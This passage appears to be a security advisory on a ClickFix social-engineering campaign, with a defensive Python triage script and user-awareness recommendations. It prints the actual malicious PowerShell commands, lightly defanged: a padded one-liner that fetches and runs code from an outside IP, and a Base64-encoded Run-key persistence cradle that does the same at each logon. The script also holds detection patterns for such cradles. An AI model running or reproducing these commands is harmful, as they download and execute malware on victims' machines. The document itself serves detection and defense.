ClickFix Command:
powershell "$iNqI3BnIyB8I2khIWUhISEheCMuUkVwbEFjRS;$FAZ='VNJSMDIMSDCNSENDMCLOFPAMQXJDFHDKS';FUNCTION MPE {Invoke-Expression (Invoke-RestMethod 94.159.113[.]37/ssd[.]png)}; $BJI=$FAZ[6]+$FAZ[13]+$FAZ[23];MPE;$iNqI3BnIyB8I2khIWUhISEhS"
The leading and trailing $iNqI3... references (an undefined variable) and the $FAZ/$BJI assignments (a string and three characters taken from it that are never used) are inert padding; the only statement that does anything is the call to MPE, which fetches content from 94.159.113[.]37 (served as ssd[.]png) with Invoke-RestMethod and runs it with Invoke-Expression.
Note: If the ClickFix command succeeds, the user is redirected to a legitimate website. This is handled by a server-side check, likely keyed on the victim's IP address.
Establishing Persistence:
Registry Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
Data: powershell iex(::ASCII.GetString(::FromBase64String('aXJtIDgwLjY0LjE5LjE0OC94LmpwZyB8aWV4')))
The Base64 string decodes to irm 80.64.19[.]148/x[.]jpg |iex, so each logon fetches and executes a second stage from a host other than the one the ClickFix command contacted. A Run value whose data invokes powershell with FromBase64String, iex or irm is worth hunting for across the fleet.
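To give defenders something to run against the two artifacts above, the following Python triage helper is an added example, not code from this advisory or from NJCCIC. It takes a command line as it would appear in process-creation telemetry or a dump of HKCU Run values, re-fangs the [.] notation, decodes every FromBase64String('...') literal (transitively, since stages nest), flags both download-cradle shapes seen on this page ("downloader | iex" and "iex (downloader ...)"), and lists the remote hosts it finds. The downloader/executor token lists and the regular expressions are assumptions made here about what is worth matching; the two sample inputs are the commands from this page, exactly as defanged above.

```python
"""Triage helper for ClickFix-style PowerShell one-liners.

Added example, not code from the advisory. Decodes embedded Base64 stages,
flags download-and-execute cradles and extracts remote hosts.
"""
import base64
import binascii
import re

# Downloader and executor tokens as written in PowerShell, aliases included
# (assumed list; extend as needed).
_DL = r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr|DownloadString|DownloadFile|curl|wget)\b"
_EX = r"\b(?:Invoke-Expression|iex)\b"
_PIPED = re.compile(_DL + r"[^|;]*\|\s*" + _EX, re.I)        # irm host/x | iex
_NESTED = re.compile(_EX + r"\s*\([^|;]*?" + _DL, re.I)      # iex (irm host/x)
_B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# Only http(s) URLs and bare IPv4 addresses with an optional path; a looser
# hostname pattern would false-positive on file names such as ssd.png.
_REMOTE = re.compile(r"https?://[^\s'\"|)]+|(?:\d{1,3}\.){3}\d{1,3}(?:/[^\s'\"|)]*)?")


def refang(text: str) -> str:
    """Undo the '[.]' defanging used in advisories so IPs and URLs parse."""
    return text.replace("[.]", ".")


def decode_base64_args(text: str) -> list[str]:
    """Decoded content of every FromBase64String('...') literal in text."""
    out = []
    for blob in _B64_ARG.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue  # truncated or not really Base64; leave it to the analyst
        # -EncodedCommand blobs are UTF-16LE; blobs fed to an ASCII/UTF-8
        # GetString, as in the Run key above, are single-byte text.
        enc = "utf-16-le" if b"\x00" in raw else "utf-8"
        out.append(raw.decode(enc, errors="replace"))
    return out


def expand_stages(text: str, max_depth: int = 3) -> list[str]:
    """The command plus every Base64 stage it embeds, decoded transitively."""
    stages, frontier = [text], [text]
    for _ in range(max_depth):
        frontier = [d for s in frontier for d in decode_base64_args(s)]
        if not frontier:
            break
        stages.extend(frontier)
    return stages


def is_download_cradle(text: str) -> bool:
    """True if text fetches remote content and hands it to Invoke-Expression."""
    return bool(_PIPED.search(text) or _NESTED.search(text))


def triage(cmd: str) -> dict:
    """Findings for one command line: cradle verdict, decoded stages, remotes."""
    stages = expand_stages(refang(cmd))
    remotes: list[str] = []
    for s in stages:
        for m in _REMOTE.finditer(s):
            if m.group(0) not in remotes:
                remotes.append(m.group(0))
    return {
        "cradle": any(is_download_cradle(s) for s in stages),
        "decoded": stages[1:],
        "remotes": remotes,
    }


# Sample inputs: the two command lines from the advisory, as defanged there.
CLICKFIX_CMD = (
    'powershell "$iNqI3BnIyB8I2khIWUhISEheCMuUkVwbEFjRS;'
    "$FAZ='VNJSMDIMSDCNSENDMCLOFPAMQXJDFHDKS';"
    "FUNCTION MPE {Invoke-Expression (Invoke-RestMethod 94.159.113[.]37/ssd[.]png)}; "
    '$BJI=$FAZ[6]+$FAZ[13]+$FAZ[23];MPE;$iNqI3BnIyB8I2khIWUhISEhS"'
)
RUN_KEY_DATA = (
    "powershell iex(::ASCII.GetString(::FromBase64String("
    "'aXJtIDgwLjY0LjE5LjE0OC94LmpwZyB8aWV4')))"
)

if __name__ == "__main__":
    for label, cmd in (("ClickFix", CLICKFIX_CMD), ("Run key", RUN_KEY_DATA)):
        print(label, triage(cmd))
```

Feed each command line from your own telemetry to triage(); remotes come back re-fanged so they can be pivoted on, so defang them again before sharing. A cradle hit on an HKCU Run value is the persistence pattern described above and warrants retrieving the second stage from an isolated host for analysis and blocking the listed addresses at the perimeter.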
Recommendations
- Exercise caution while online, verifying any unusual requests or instructions.
- Provide user awareness training that covers these social engineering techniques, including fake verification prompts that ask the user to paste a command into the Run dialog or a terminal.
- Maintain robust and up-to-date endpoint detection tools on every endpoint.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Review the Don't Take the Bait! Phishing and Other Social Engineering Attacks NJCCIC product for more information on common phishing and social engineering attacks.
- Report social engineering and other malicious cyber activity to the NJCCIC and the FBI's IC3.
